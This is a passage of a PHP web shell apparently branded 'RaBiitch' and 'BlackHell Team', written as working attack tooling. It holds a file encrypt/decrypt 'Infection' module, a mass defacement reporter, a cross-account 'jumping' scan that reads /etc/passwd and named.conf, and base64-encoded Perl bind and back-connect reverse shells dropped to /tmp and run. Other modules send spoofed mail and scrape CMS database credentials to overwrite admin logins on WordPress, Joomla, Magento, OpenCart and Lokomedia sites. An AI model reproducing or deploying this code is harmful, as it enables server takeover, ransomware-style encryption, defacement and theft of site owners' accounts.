  3693.             $decrypted = rtrim(mcrypt_decrypt(MCRYPT_RIJNDAEL_128,
  3694. hash('sha256', $key, true), substr($data,
  3695. mcrypt_get_iv_size(MCRYPT_RIJNDAEL_128, MCRYPT_MODE_CBC)),
  3696. MCRYPT_MODE_CBC,
  3697. $iv), "\0");
  3698.             if(file_put_contents($locate, $decrypted)) {
  3699.                 echo '<i class="fa fa-unlock"
  3700. aria-hidden="true"></i> <font
  3701. color="#FFEB3B">Unlock</font> (<font
  3702. color="#40CE08">Success</font>) <font
  3703. color="#FF9800">|</font> <font
  3704. color="#2196F3">' . $locate . '</font> <br>';
  3705.             } else {
  3706.                 echo '<i class="fa fa-unlock"
  3707. aria-hidden="true"></i> <font
  3708. color="#FFEB3B">Unlock</font> (<font
  3709. color="red">Failed</font>) <font
  3710. color="#FF9800">|</font> <font
  3711. color="#2196F3">' . $locate . '</font> <br>';
  3712.             }
  3713.         }
  3714.         public function kecuali($ext, $name) {
  3715.             $re = "/({$name})/";
  3716.             preg_match($re, $ext, $matches);
  3717.             if($matches[1]) {
  3718.                 return false;
  3719.             }
  3720.             return true;
  3721.         }
  3722.     }
  3723.     if($_POST['submit']) {
  3724.         switch($_POST['method']) {
  3725.             case '1':
  3726.                 deRanSomeware::shcdirs(deRanSomeware::locate(),
  3727. "1", $_POST['key']);
  3728.                 break;
  3729.             case '2':
  3730.                 deRanSomeware::shcdirs(deRanSomeware::locate(), "2", $_POST['key']);
  3731.                 break;
  3732.         }
  3733.     } else {
  3734.         echo "
  3735. <form action='' method='post' style='text-align: center;'>
  3736. <label>Key : </label>
  3737. <input type='text' name='key' class='inpute' placeholder='KEY ENC/DEC'>
  3738. <select name='method' class='selecte'>
  3739.         <option value='1'>Infection</option>
  3740.         <option value='2'>DeInfection</option>
  3741.      </select>
  3742.      <input type='submit' name='submit' class='submite' value='Submit'/>
  3743. </form>";
  3744.     }
  3745.     echo "
  3746. </div>
  3747. </body>";
  3748. }
  3749.  
  3750.  
  3751.  
  3752.  
  3753.  
  3754.  
  3755.  
  3756.  
  3757.  
  3758.  
  3759. elseif($_GET['RaBiitch'] == 'defid') {
  3760. echo "<center><form method='post'>
  3761.         <u>Defacer</u>: <br>
  3762.         <input type='text' name='hekel' size='50' value='RaBiitch'><br>
  3763.         <u>Team</u>: <br>
  3764.         <input type='text' name='tim' size='50' value='BlackHell Team'><br>
  3765.         <u>Domains</u>: <br>
  3766.         <textarea style='width: 450px; height: 150px;' name='sites'></textarea><br>
  3767.         <input type='submit' name='go' value='Submit' style='width: 450px;'>
  3768.         </form>";
  3769. $site = explode("\r\n", $_POST['sites']);
  3770. $go = $_POST['go'];
  3771. $hekel = $_POST['hekel'];
  3772. $tim = $_POST['tim'];
  3773. if($go) {
  3774. foreach($site as $sites) {
  3775. $zh = $sites;
  3776. $form_url = "https://www.defacer.id/notify";
  3777. $data_to_post = array();
  3778. $data_to_post['attacker'] = "$hekel";
  3779. $data_to_post['team'] = "$tim";
  3780. $data_to_post['poc'] = 'SQL Injection';
  3781. $data_to_post['url'] = "$zh";
  3782. $curl = curl_init();
  3783. curl_setopt($curl,CURLOPT_URL, $form_url);
  3784. curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
  3785. curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
  3786. curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
  3787. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  3788. curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
  3789. $result = curl_exec($curl);
  3790. echo $result;
  3791. curl_close($curl);
  3792. echo "<br>";
  3793. }
  3794. }
  3795. }elseif($_GET['RaBiitch'] == 'jumping') {
  3796.     $i = 0;
  3797.     echo "<div class='margin: 5px auto;'>";
  3798.     if(preg_match("/hsphere/", $dir)) {
  3799.         $urls = explode("\r\n", $_POST['url']);
  3800.         if(isset($_POST['jump'])) {
  3801.             echo "<pre>";
  3802.             foreach($urls as $url) {
  3803.                 $url = str_replace(array("http://","www."), "", strtolower($url));
  3804.                 $etc = "/etc/passwd";
  3805.                 $f = fopen($etc,"r");
  3806.                 while($gets = fgets($f)) {
  3807.                     $pecah = explode(":", $gets);
  3808.                     $user = $pecah[0];
  3809.                     $dir_user = "/hsphere/local/home/$user";
  3810.                     if(is_dir($dir_user) === true) {
  3811.                         $url_user = $dir_user."/".$url;
  3812.                         if(is_readable($url_user)) {
  3813.                             $i++;
  3814.                             $jrw = "[<font color=green>R</font>] <a href='?path=$url_user'><font color=gold>$url_user</font></a>";
  3815.                             if(is_writable($url_user)) {
  3816.                                 $jrw = "[<font color=green>RW</font>] <a href='?path=$url_user'><font color=gold>$url_user</font></a>";
  3817.                             }
  3818.                             echo $jrw."<br>";
  3819.                         }
  3820.                     }
  3821.                 }
  3822.             }
  3823.         if($i == 0) {
  3824.         } else {
  3825.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  3826.         }
  3827.         echo "</pre>";
  3828.         } else {
  3829.             echo '<center>
  3830.                   <form method="post">
  3831.                   List Domains: <br>
  3832.                   <textarea name="url" style="width: 500px; height: 250px;">';
  3833.             $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  3834.             while($getss = fgets($fp)) {
  3835.                 echo $getss;
  3836.             }
  3837.             echo  '</textarea><br>
  3838.                   <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  3839.                   </form></center>';
  3840.         }
  3841.     } elseif(preg_match("/vhosts/", $dir)) {
  3842.         $urls = explode("\r\n", $_POST['url']);
  3843.         if(isset($_POST['jump'])) {
  3844.             echo "<pre>";
  3845.             foreach($urls as $url) {
  3846.                 $web_vh = "/var/www/vhosts/$url/httpdocs";
  3847.                 if(is_dir($web_vh) === true) {
  3848.                     if(is_readable($web_vh)) {
  3849.                         $i++;
  3850.                         $jrw = "[<font color=green>R</font>] <a href='?path=$web_vh'><font color=gold>$web_vh</font></a>";
  3851.                         if(is_writable($web_vh)) {
  3852.                             $jrw = "[<font color=green>RW</font>] <a href='?path=$web_vh'><font color=gold>$web_vh</font></a>";
  3853.                         }
  3854.                         echo $jrw."<br>";
  3855.                     }
  3856.                 }
  3857.             }
  3858.         if($i == 0) {
  3859.         } else {
  3860.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  3861.         }
  3862.         echo "</pre>";
  3863.         } else {
  3864.             echo '<center>
  3865.                   <form method="post">
  3866.                   List Domains: <br>
  3867.                   <textarea name="url" style="width: 500px; height: 250px;">';
  3868.                   bing("ip:$ip");
  3869.             echo  '</textarea><br>
  3870.                   <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  3871.                   </form></center>';
  3872.         }
  3873.     } else {
  3874.         echo "<pre>";
  3875.         $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  3876.         while($passwd = fgets($etc)) {
  3877.             if($passwd == '' || !$etc) {
  3878.                 echo "<font color=red>Can't read /etc/passwd</font>";
  3879.             } else {
  3880.                 preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  3881.                 foreach($user_jumping[1] as $myuser_jump) {
  3882.                     $user_jumping_dir = "/home/$myuser_jump/public_html";
  3883.                     if(is_readable($user_jumping_dir)) {
  3884.                         $i++;
  3885.                         $jrw = "[<font color=green>R</font>] <a href='?path=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  3886.                         if(is_writable($user_jumping_dir)) {
  3887.                             $jrw = "[<font color=green>RW</font>] <a href='?path=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  3888.                         }
  3889.                         echo $jrw;
  3890.                         if(function_exists('posix_getpwuid')) {
  3891.                             $domain_jump = file_get_contents("/etc/named.conf");   
  3892.                             if($domain_jump == '') {
  3893.                                 echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  3894.                             } else {
  3895.                                 preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  3896.                                 foreach($domains_jump[1] as $dj) {
  3897.                                     $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  3898.                                     $user_jumping_url = $user_jumping_url['name'];
  3899.                                     if($user_jumping_url == $myuser_jump) {
  3900.                                         echo " => ( <u>$dj</u> )<br>";
  3901.                                         break;
  3902.                                     }
  3903.                                 }
  3904.                             }
  3905.                         } else {
  3906.                             echo "<br>";
  3907.                         }
  3908.                     }
  3909.                 }
  3910.             }
  3911.         }
  3912.         if($i == 0) {
  3913.         } else {
  3914.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  3915.         }
  3916.         echo "</pre>";
  3917.     }
  3918.     echo "</div>";
  3919. }elseif($_GET['RaBiitch'] == 'network') {
  3920.     echo "<form method='post'>
  3921.     <u>Bind Port:</u> <br>
  3922.     PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
  3923.     <input type='submit' name='sub_bp' value='>>'>
  3924.     </form>
  3925.     <form method='post'>
  3926.     <u>Back Connect:</u> <br>
  3927.     Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
  3928.     PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
  3929.     <input type='submit' name='sub_bc' value='>>'>
  3930.     </form>";
  3931.     $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
  3932.     if(isset($_POST['sub_bp'])) {
  3933.         $f_bp = fopen("/tmp/bp.pl", "w");
  3934.         fwrite($f_bp, base64_decode($bind_port_p));
  3935.         fclose($f_bp);
  3936.  
  3937.         $port = $_POST['port_bind'];
  3938.         $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
  3939.         sleep(1);
  3940.         echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
  3941.         unlink("/tmp/bp.pl");
  3942.     }
  3943.     $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
  3944.     if(isset($_POST['sub_bc'])) {
  3945.         $f_bc = fopen("/tmp/bc.pl", "w");
  3946.         fwrite($f_bc, base64_decode($bind_connect_p));
  3947.         fclose($f_bc);
  3948.  
  3949.         $ipbc = $_POST['ip_bc'];
  3950.         $port = $_POST['port_bc'];
  3951.         $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
  3952.         sleep(1);
  3953.         echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
  3954.         unlink("/tmp/bc.pl");
  3955.     }
  3956. }elseif($_GET['RaBiitch'] == 'jumping') {
  3957.     $i = 0;
  3958.     echo "<div class='margin: 5px auto;'>";
  3959.     if(preg_match("/hsphere/", $dir)) {
  3960.         $urls = explode("\r\n", $_POST['url']);
  3961.         if(isset($_POST['jump'])) {
  3962.             echo "<pre>";
  3963.             foreach($urls as $url) {
  3964.                 $url = str_replace(array("http://","www."), "", strtolower($url));
  3965.                 $etc = "/etc/passwd";
  3966.                 $f = fopen($etc,"r");
  3967.                 while($gets = fgets($f)) {
  3968.                     $pecah = explode(":", $gets);
  3969.                     $user = $pecah[0];
  3970.                     $dir_user = "/hsphere/local/home/$user";
  3971.                     if(is_dir($dir_user) === true) {
  3972.                         $url_user = $dir_user."/".$url;
  3973.                         if(is_readable($url_user)) {
  3974.                             $i++;
  3975.                             $jrw = "[<font color=green>R</font>] <a href='?path=$url_user'><font color=gold>$url_user</font></a>";
  3976.                             if(is_writable($url_user)) {
  3977.                                 $jrw = "[<font color=green>RW</font>] <a href='?path=$url_user'><font color=gold>$url_user</font></a>";
  3978.                             }
  3979.                             echo $jrw."<br>";
  3980.                         }
  3981.                     }
  3982.                 }
  3983.             }
  3984.         if($i == 0) {
  3985.         } else {
  3986.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  3987.         }
  3988.         echo "</pre>";
  3989.         } else {
  3990.             echo '<center>
  3991.                   <form method="post">
  3992.                   List Domains: <br>
  3993.                   <textarea name="url" style="width: 500px; height: 250px;">';
  3994.             $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  3995.             while($getss = fgets($fp)) {
  3996.                 echo $getss;
  3997.             }
  3998.             echo  '</textarea><br>
  3999.                   <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  4000.                   </form></center>';
  4001.         }
  4002.     } elseif(preg_match("/vhosts/", $dir)) {
  4003.         $urls = explode("\r\n", $_POST['url']);
  4004.         if(isset($_POST['jump'])) {
  4005.             echo "<pre>";
  4006.             foreach($urls as $url) {
  4007.                 $web_vh = "/var/www/vhosts/$url/httpdocs";
  4008.                 if(is_dir($web_vh) === true) {
  4009.                     if(is_readable($web_vh)) {
  4010.                         $i++;
  4011.                         $jrw = "[<font color=green>R</font>] <a href='?path=$web_vh'><font color=gold>$web_vh</font></a>";
  4012.                         if(is_writable($web_vh)) {
  4013.                             $jrw = "[<font color=green>RW</font>] <a href='?path=$web_vh'><font color=gold>$web_vh</font></a>";
  4014.                         }
  4015.                         echo $jrw."<br>";
  4016.                     }
  4017.                 }
  4018.             }
  4019.         if($i == 0) {
  4020.         } else {
  4021.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  4022.         }
  4023.         echo "</pre>";
  4024.         } else {
  4025.             echo '<center>
  4026.                   <form method="post">
  4027.                   List Domains: <br>
  4028.                   <textarea name="url" style="width: 500px; height: 250px;">';
  4029.                   bing("ip:$ip");
  4030.             echo  '</textarea><br>
  4031.                   <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  4032.                   </form></center>';
  4033.         }
  4034.     } else {
  4035.         echo "<pre>";
  4036.         $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  4037.         while($passwd = fgets($etc)) {
  4038.             if($passwd == '' || !$etc) {
  4039.                 echo "<font color=red>Can't read /etc/passwd</font>";
  4040.             } else {
  4041.                 preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  4042.                 foreach($user_jumping[1] as $myuser_jump) {
  4043.                     $user_jumping_dir = "/home/$myuser_jump/public_html";
  4044.                     if(is_readable($user_jumping_dir)) {
  4045.                         $i++;
  4046.                         $jrw = "[<font color=green>R</font>] <a href='?path=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  4047.                         if(is_writable($user_jumping_dir)) {
  4048.                             $jrw = "[<font color=green>RW</font>] <a href='?path=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  4049.                         }
  4050.                         echo $jrw;
  4051.                         if(function_exists('posix_getpwuid')) {
  4052.                             $domain_jump = file_get_contents("/etc/named.conf");   
  4053.                             if($domain_jump == '') {
  4054.                                 echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  4055.                             } else {
  4056.                                 preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  4057.                                 foreach($domains_jump[1] as $dj) {
  4058.                                     $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  4059.                                     $user_jumping_url = $user_jumping_url['name'];
  4060.                                     if($user_jumping_url == $myuser_jump) {
  4061.                                         echo " => ( <u>$dj</u> )<br>";
  4062.                                         break;
  4063.                                     }
  4064.                                 }
  4065.                             }
  4066.                         } else {
  4067.                             echo "<br>";
  4068.                         }
  4069.                     }
  4070.                 }
  4071.             }
  4072.         }
  4073.         if($i == 0) {
  4074.         } else {
  4075.             echo "<br>Total ada ".$i." Kamar di ".$ip;
  4076.         }
  4077.         echo "</pre>";
  4078.     }
  4079.     echo "</div>";
  4080. }elseif($_GET['RaBiitch'] == 'mail') {
  4081. if($_POST['send']) {
  4082.   $to = $_POST['to'];
  4083.   $from = $_POST['from'];
  4084.   $subject = $_POST['subject'];
  4085.   $content = sulap($_POST['content']);
  4086.   if(@mail($to,$subject,$content,"FROM:$from")) {
  4087.     $out = "Mail sent to $to";
  4088.   } else {
  4089.     $out = "Failed !!";
  4090.   }
  4091. }
  4092.   echo "<h1>Mailer</h1>
  4093. <form method='post'>
  4094. <textarea name='content' value='Patch your security !' placeholder='Patch your security !'></textarea><br>
  4095. Subject :
  4096. <input type='text' name='subject' value='Your Website'><br>
  4097. To : <input type='text' name='to' value='admin@web.com'><br>From : <input type='text' name='from' value='email_lu@gmail.com'><br><input type='submit' name='send' value='Send'><br><br>";
  4098. echo $out;
  4099. }elseif($_GET['RaBiitch'] == 'edituser') {
  4100.     if($_POST['hajar']) {
  4101.         if(strlen($_POST['pass_baru']) < 6 OR strlen($_POST['user_baru']) < 6) {
  4102.             echo "username atau password harus lebih dari 6 karakter";
  4103.         } else {
  4104.             $user_baru = $_POST['user_baru'];
  4105.             $pass_baru = md5($_POST['pass_baru']);
  4106.             $conf = $_POST['config_dir'];
  4107.             $scan_conf = scandir($conf);
  4108.             foreach($scan_conf as $file_conf) {
  4109.                 if(!is_file("$conf/$file_conf")) continue;
  4110.                 $config = file_get_contents("$conf/$file_conf");
  4111.                 if(preg_match("/JConfig|joomla/",$config)) {
  4112.                     $dbhost = ambilkata($config,"host = '","'");
  4113.                     $dbuser = ambilkata($config,"user = '","'");
  4114.                     $dbpass = ambilkata($config,"password = '","'");
  4115.                     $dbname = ambilkata($config,"db = '","'");
  4116.                     $dbprefix = ambilkata($config,"dbprefix = '","'");
  4117.                     $prefix = $dbprefix."users";
  4118.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  4119.                     $db = mysql_select_db($dbname);
  4120.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  4121.                     $result = mysql_fetch_array($q);
  4122.                     $id = $result['id'];
  4123.                     $site = ambilkata($config,"sitename = '","'");
  4124.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE id='$id'");
  4125.                     echo "Config => ".$file_conf."<br>";
  4126.                     echo "CMS => Joomla<br>";
  4127.                     if($site == '') {
  4128.                         echo "Sitename => <font color=red>error, gabisa ambil nama domain nya</font><br>";
  4129.                     } else {
  4130.                         echo "Sitename => $site<br>";
  4131.                     }
  4132.                     if(!$update OR !$conn OR !$db) {
  4133.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  4134.                     } else {
  4135.                         echo "Status => <font color=green>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  4136.                     }
  4137.                     mysql_close($conn);
  4138.                 } elseif(preg_match("/WordPress/",$config)) {
  4139.                     $dbhost = ambilkata($config,"DB_HOST', '","'");
  4140.                     $dbuser = ambilkata($config,"DB_USER', '","'");
  4141.                     $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  4142.                     $dbname = ambilkata($config,"DB_NAME', '","'");
  4143.                     $dbprefix = ambilkata($config,"table_prefix  = '","'");
  4144.                     $prefix = $dbprefix."users";
  4145.                     $option = $dbprefix."options";
  4146.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  4147.                     $db = mysql_select_db($dbname);
  4148.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  4149.                     $result = mysql_fetch_array($q);
  4150.                     $id = $result[ID];
  4151.                     $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  4152.                     $result2 = mysql_fetch_array($q2);
  4153.                     $target = $result2[option_value];
  4154.                     if($target == '') {
  4155.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  4156.                     } else {
  4157.                         $url_target = "Login => <a href='$target/wp-login.php' target='_blank'><u>$target/wp-login.php</u></a><br>";
  4158.                     }
  4159.                     $update = mysql_query("UPDATE $prefix SET user_login='$user_baru',user_pass='$pass_baru' WHERE id='$id'");
  4160.                     echo "Config => ".$file_conf."<br>";
  4161.                     echo "CMS => Wordpress<br>";
  4162.                     echo $url_target;
  4163.                     if(!$update OR !$conn OR !$db) {
  4164.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  4165.                     } else {
  4166.                         echo "Status => <font color=green>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  4167.                     }
  4168.                     mysql_close($conn);
  4169.                 } elseif(preg_match("/Magento|Mage_Core/",$config)) {
  4170.                     $dbhost = ambilkata($config,"<host><![CDATA[","]]></host>");
  4171.                     $dbuser = ambilkata($config,"<username><![CDATA[","]]></username>");
  4172.                     $dbpass = ambilkata($config,"<password><![CDATA[","]]></password>");
  4173.                     $dbname = ambilkata($config,"<dbname><![CDATA[","]]></dbname>");
  4174.                     $dbprefix = ambilkata($config,"<table_prefix><![CDATA[","]]></table_prefix>");
  4175.                     $prefix = $dbprefix."admin_user";
  4176.                     $option = $dbprefix."core_config_data";
  4177.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  4178.                     $db = mysql_select_db($dbname);
  4179.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  4180.                     $result = mysql_fetch_array($q);
  4181.                     $id = $result[user_id];
  4182.                     $q2 = mysql_query("SELECT * FROM $option WHERE path='web/secure/base_url'");
  4183.                     $result2 = mysql_fetch_array($q2);
  4184.                     $target = $result2[value];
  4185.                     if($target == '') {
  4186.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  4187.                     } else {
  4188.                         $url_target = "Login => <a href='$target/admin/' target='_blank'><u>$target/admin/</u></a><br>";
  4189.                     }
  4190.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  4191.                     echo "Config => ".$file_conf."<br>";
  4192.                     echo "CMS => Magento<br>";
  4193.                     echo $url_target;
  4194.                     if(!$update OR !$conn OR !$db) {
  4195.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  4196.                     } else {
  4197.                         echo "Status => <font color=green>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  4198.                     }
  4199.                     mysql_close($conn);
  4200.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/",$config)) {
  4201.                     $dbhost = ambilkata($config,"'DB_HOSTNAME', '","'");
  4202.                     $dbuser = ambilkata($config,"'DB_USERNAME', '","'");
  4203.                     $dbpass = ambilkata($config,"'DB_PASSWORD', '","'");
  4204.                     $dbname = ambilkata($config,"'DB_DATABASE', '","'");
  4205.                     $dbprefix = ambilkata($config,"'DB_PREFIX', '","'");
  4206.                     $prefix = $dbprefix."user";
  4207.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  4208.                     $db = mysql_select_db($dbname);
  4209.                     $q = mysql_query("SELECT * FROM $prefix ORDER BY user_id ASC");
  4210.                     $result = mysql_fetch_array($q);
  4211.                     $id = $result[user_id];
  4212.                     $target = ambilkata($config,"HTTP_SERVER', '","'");
  4213.                     if($target == '') {
  4214.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  4215.                     } else {
  4216.                         $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a><br>";
  4217.                     }
  4218.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE user_id='$id'");
  4219.                     echo "Config => ".$file_conf."<br>";
  4220.                     echo "CMS => OpenCart<br>";
  4221.                     echo $url_target;
  4222.                     if(!$update OR !$conn OR !$db) {
  4223.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  4224.                     } else {
  4225.                         echo "Status => <font color=green>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  4226.                     }
  4227.                     mysql_close($conn);
  4228.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/",$config)) {
  4229.                     $dbhost = ambilkata($config,'server = "','"');
  4230.                     $dbuser = ambilkata($config,'username = "','"');
  4231.                     $dbpass = ambilkata($config,'password = "','"');
  4232.                     $dbname = ambilkata($config,'database = "','"');
  4233.                     $prefix = "users";
  4234.                     $option = "identitas";
  4235.                     $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  4236.                     $db = mysql_select_db($dbname);
  4237.                     $q = mysql_query("SELECT * FROM $option ORDER BY id_identitas ASC");
  4238.                     $result = mysql_fetch_array($q);
  4239.                     $target = $result[alamat_website];
  4240.                     if($target == '') {
  4241.                         $target2 = $result[url];
  4242.                         $url_target = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  4243.                         if($target2 == '') {
  4244.                             $url_target2 = "Login => <font color=red>error, gabisa ambil nama domain nyaa</font><br>";
  4245.                         } else {
  4246.                             $cek_login3 = file_get_contents("$target2/adminweb/");
  4247.                             $cek_login4 = file_get_contents("$target2/lokomedia/adminweb/");
  4248.                             if(preg_match("/CMS Lokomedia|Administrator/", $cek_login3)) {
  4249.                                 $url_target2 = "Login => <a href='$target2/adminweb' target='_blank'><u>$target2/adminweb</u></a><br>";
  4250.                             } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login4)) {
  4251.                                 $url_target2 = "Login => <a href='$target2/lokomedia/adminweb' target='_blank'><u>$target2/lokomedia/adminweb</u></a><br>";
  4252.                             } else {
  4253.                                 $url_target2 = "Login => <a href='$target2' target='_blank'><u>$target2</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  4254.                             }
  4255.                         }
  4256.                     } else {
  4257.                         $cek_login = file_get_contents("$target/adminweb/");
  4258.                         $cek_login2 = file_get_contents("$target/lokomedia/adminweb/");
  4259.                         if(preg_match("/CMS Lokomedia|Administrator/", $cek_login)) {
  4260.                             $url_target = "Login => <a href='$target/adminweb' target='_blank'><u>$target/adminweb</u></a><br>";
  4261.                         } elseif(preg_match("/CMS Lokomedia|Lokomedia/", $cek_login2)) {
  4262.                             $url_target = "Login => <a href='$target/lokomedia/adminweb' target='_blank'><u>$target/lokomedia/adminweb</u></a><br>";
  4263.                         } else {
  4264.                             $url_target = "Login => <a href='$target' target='_blank'><u>$target</u></a> [ <font color=red>gatau admin login nya dimana :p</font> ]<br>";
  4265.                         }
  4266.                     }
  4267.                     $update = mysql_query("UPDATE $prefix SET username='$user_baru',password='$pass_baru' WHERE level='admin'");
  4268.                     echo "Config => ".$file_conf."<br>";
  4269.                     echo "CMS => Lokomedia<br>";
  4270.                     if(preg_match('/error, gabisa ambil nama domain nya/', $url_target)) {
  4271.                         echo $url_target2;
  4272.                     } else {
  4273.                         echo $url_target;
  4274.                     }
  4275.                     if(!$update OR !$conn OR !$db) {
  4276.                         echo "Status => <font color=red>".mysql_error()."</font><br><br>";
  4277.                     } else {
  4278.                         echo "Status => <font color=green>sukses edit user, silakan login dengan user & pass yang baru.</font><br><br>";
  4279.                     }
  4280.                     mysql_close($conn);
  4281.                 }
  4282.             }
  4283.         }
  4284.     } else {
  4285.         echo "<center>
  4286.         <h1>Auto Edit User Config</h1>
  4287.         <form method='post'>
  4288.         DIR Config: <br>
  4289.         <input type='text' size='50' name='config_dir' value='$path'><br><br>
  4290.         Set User & Pass: <br>
  4291.         <input type='text' name='user_baru' value='RaBiitch' placeholder='user_baru'><br>
  4292.         <input type='text' name='pass_baru' value='RaBiitch' placeholder='pass_baru'><br>
  4293.         <input type='submit' name='hajar' value='Edit' style='width: 215px;'>
  4294.         </form>";
  4295.     }
  4296. }elseif(isset($_GET['filesrc'])){
  4297. echo "<tr><td>Current File : ";
